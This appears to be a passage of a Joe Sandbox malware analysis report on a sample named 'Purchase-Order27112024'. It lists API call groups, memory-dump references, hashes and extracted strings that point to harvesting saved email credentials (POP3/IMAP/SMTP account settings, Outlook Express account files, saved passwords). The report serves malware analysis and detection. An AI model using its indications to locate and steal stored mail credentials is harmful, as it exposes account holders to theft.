                                                                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                      • String ID: sysdatetimepick32
                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                      • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                      • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                      • String ID:
                                                                                                      • API String ID: 3642520215-0
                                                                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 1999381814-0
                                                                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                      APIs
                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 438689982-4203073231
                                                                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm$__aullrem
                                                                                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                      • API String ID: 643879872-978417875
                                                                                                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,75B4EB20,?), ref: 004081B9
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                      • API String ID: 524865279-2190619648
                                                                                                      • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                      • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                      • String ID: 0$6
                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                      • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                      • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                      • String ID: %2.2X
                                                                                                      • API String ID: 125969286-791839006
                                                                                                      • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                      • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                      • String ID: ACD
                                                                                                      • API String ID: 1886237854-620537770
                                                                                                      • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                      • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                      • String ID: caption$dialog_%d
                                                                                                      • API String ID: 2923679083-4161923789
                                                                                                      • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                      • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                      APIs
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                      • memset.MSVCRT ref: 00410246
                                                                                                      • memset.MSVCRT ref: 00410258
                                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                      • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 3974772901-0
                                                                                                      • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                      • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 577244452-0
                                                                                                      • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                      • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                      • String ID: imap$pop3$smtp
                                                                                                      • API String ID: 2025310588-821077329
                                                                                                      • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                      • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
